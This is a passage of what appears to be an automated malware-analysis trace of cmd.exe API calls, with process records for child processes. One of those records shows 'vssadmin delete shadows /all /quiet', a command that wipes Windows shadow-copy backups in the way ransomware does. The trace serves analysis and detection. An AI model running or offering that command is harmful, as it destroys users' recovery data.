[0246.195] GetEnvironmentStringsW () returned 0x3889c0* [0246.195] GetProcessHeap () returned 0x370000 [0246.195] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb22) returned 0x38e9b0 [0246.195] FreeEnvironmentStringsW (penv=0x3889c0) returned 1 [0246.195] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x25ebe8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x25ebe8, ReturnLength=0x0) returned 0x0 [0246.195] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd3000, lpBuffer=0x25ec20, nSize=0x380, lpNumberOfBytesRead=0x25ebe0 | out: lpBuffer=0x25ec20*, lpNumberOfBytesRead=0x25ebe0*=0x380) returned 1 [0246.196] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0246.993] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x25f228 | out: lpExitCode=0x25f228*=0x2) returned 1 [0246.993] CloseHandle (hObject=0x50) returned 1 [0246.993] _vsnwprintf (in: _Buffer=0x25f498, _BufferCount=0x13, _Format="%08X", _ArgList=0x25f238 | out: _Buffer="00000002") returned 8 [0246.993] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0246.993] GetProcessHeap () returned 0x370000 [0246.993] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38e9b0 | out: hHeap=0x370000) returned 1 [0246.993] GetEnvironmentStringsW () returned 0x3889c0* [0246.993] GetProcessHeap () returned 0x370000 [0246.993] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb22) returned 0x38e9b0 [0246.993] FreeEnvironmentStringsW (penv=0x3889c0) returned 1 [0246.993] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0246.993] GetProcessHeap () returned 0x370000 [0246.993] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38e9b0 | out: hHeap=0x370000) returned 1 [0246.993] GetEnvironmentStringsW () returned 0x3889c0* [0246.994] GetProcessHeap () returned 0x370000 [0246.994] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb22) returned 0x38e9b0 [0246.994] FreeEnvironmentStringsW (penv=0x3889c0) returned 1 [0246.994] GetProcessHeap () returned 0x370000 [0246.994] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389ac0 | out: hHeap=0x370000) returned 1 [0246.994] DeleteProcThreadAttributeList (in: lpAttributeList=0x25f2f8 | out: lpAttributeList=0x25f2f8) [0246.994] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0246.994] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.994] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0246.994] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.994] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x4abae194 | out: lpMode=0x4abae194) returned 0 [0246.994] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.995] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x4abae198 | out: lpMode=0x4abae198) returned 0 [0246.995] GetConsoleOutputCP () returned 0x4e3 [0246.995] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0246.995] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389c60 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38ba00 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385bb0 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b9a0 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389a50 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38aae0 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x390090 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384630 | out: hHeap=0x370000) returned 1 [0246.995] GetProcessHeap () returned 0x370000 [0246.995] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x389840 | out: hHeap=0x370000) returned 1 [0246.995] _vsnwprintf (in: _Buffer=0x4abc6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x25f758 | out: _Buffer="\r\n") returned 2 [0246.995] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.995] GetFileType (hFile=0xf4) returned 0x3 [0246.996] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.996] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3 [0246.996] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x25f728, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f728*=0x2, lpOverlapped=0x0) returned 1 [0246.996] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4abaf360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0246.996] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4abbc0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0246.996] _vsnwprintf (in: _Buffer=0x4abaeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x25f768 | out: _Buffer="C:\\Windows\\system32") returned 19 [0246.996] _vsnwprintf (in: _Buffer=0x4abaeb86, _BufferCount=0x3eb, _Format="%c", _ArgList=0x25f768 | out: _Buffer=">") returned 1 [0246.996] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.996] GetFileType (hFile=0xf4) returned 0x3 [0246.996] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.996] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32>", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32>", lpUsedDefaultChar=0x0) returned 21 [0246.996] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x25f758, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25f758*=0x14, lpOverlapped=0x0) returned 1 [0246.996] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.996] GetFileType (hFile=0xe8) returned 0x3 [0246.996] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.996] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.996] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.996] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe320, cchWideChar=1 | out: lpWideCharStr="Essadmin delete shadows /all /quiet\n") returned 1 [0246.996] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.996] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.996] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.996] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe322, cchWideChar=1 | out: lpWideCharStr="xsadmin delete shadows /all /quiet\n") returned 1 [0246.996] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.996] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.996] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.996] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe324, cchWideChar=1 | out: lpWideCharStr="iadmin delete shadows /all /quiet\n") returned 1 [0246.996] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.996] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.996] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.996] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe326, cchWideChar=1 | out: lpWideCharStr="tdmin delete shadows /all /quiet\n") returned 1 [0246.997] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.997] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.997] ReadFile (in: hFile=0xe8, lpBuffer=0x4abbc320, nNumberOfBytesToRead=0x1, lpNumberOfBytesRead=0x25fa58, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesRead=0x25fa58*=0x1, lpOverlapped=0x0) returned 1 [0246.997] MultiByteToWideChar (in: CodePage=0x4e3, dwFlags=0x1, lpMultiByteStr=0x4abbc320, cbMultiByte=1, lpWideCharStr=0x4abbe328, cchWideChar=1 | out: lpWideCharStr="\nmin delete shadows /all /quiet\n") returned 1 [0246.997] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.997] GetFileType (hFile=0xe8) returned 0x3 [0246.997] _get_osfhandle (_FileHandle=0) returned 0xe8 [0246.997] SetFilePointer (in: hFile=0xe8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0246.997] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.997] GetFileType (hFile=0xf4) returned 0x3 [0246.997] _get_osfhandle (_FileHandle=1) returned 0xf4 [0246.997] WideCharToMultiByte (in: CodePage=0x4e3, dwFlags=0x0, lpWideCharStr="Exit\n", cchWideChar=-1, lpMultiByteStr=0x4abbc320, cbMultiByte=8192, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Exit\n", lpUsedDefaultChar=0x0) returned 6 [0246.997] WriteFile (in: hFile=0xf4, lpBuffer=0x4abbc320*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x25fa38, lpOverlapped=0x0 | out: lpBuffer=0x4abbc320*, lpNumberOfBytesWritten=0x25fa38*=0x5, lpOverlapped=0x0) returned 1 [0246.997] GetProcessHeap () returned 0x370000 [0246.997] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x4012) returned 0x392010 [0246.997] GetProcessHeap () returned 0x370000 [0246.997] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x392010 | out: hHeap=0x370000) returned 1 [0246.997] GetProcessHeap () returned 0x370000 [0246.997] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0xb0) returned 0x389840 [0246.997] GetProcessHeap () returned 0x370000 [0246.997] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1a) returned 0x384630 [0246.997] GetConsoleOutputCP () returned 0x4e3 [0246.998] GetCPInfo (in: CodePage=0x4e3, lpCPInfo=0x4abbbfe0 | out: lpCPInfo=0x4abbbfe0) returned 1 [0246.998] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0246.998] GetConsoleTitleW (in: lpConsoleTitle=0x25f9f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.998] GetProcessHeap () returned 0x370000 [0246.998] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x14) returned 0x388940 [0246.998] GetProcessHeap () returned 0x370000 [0246.998] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1a) returned 0x384660 [0246.998] GetProcessHeap () returned 0x370000 [0246.998] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x21c) returned 0x38b9a0 [0246.998] GetConsoleTitleW (in: lpConsoleTitle=0x38b9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0246.998] GetProcessHeap () returned 0x370000 [0246.998] RtlReAllocateHeap (Heap=0x370000, Flags=0x0, Ptr=0x38b9a0, Size=0x62) returned 0x38b9a0 [0246.998] GetProcessHeap () returned 0x370000 [0246.998] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x38b9a0) returned 0x62 [0246.998] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe - Exit") returned 1 [0246.999] GetProcessHeap () returned 0x370000 [0246.999] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38b9a0 | out: hHeap=0x370000) returned 1 [0246.999] SetConsoleTitleW (lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 1 [0246.999] exit (_Code=2) Process: id = "11" image_name = "mode.com" filename = "c:\\windows\\system32\\mode.com" page_root = "0x6ea51000" os_pid = "0x6dc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x5c4" cmd_line = "mode con cp select=1251" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 67 os_tid = 0x6e0 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\system32\\vssadmin.exe" page_root = "0x6f674000" os_pid = "0x724" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0x5c4" cmd_line = "vssadmin delete shadows /all /quiet" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e4d3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0x728 Thread: id = 69 os_tid = 0x740 Thread: id = 70 os_tid = 0x748 Thread: id = 71 os_tid = 0x74c Thread: id = 72 os_tid = 0x750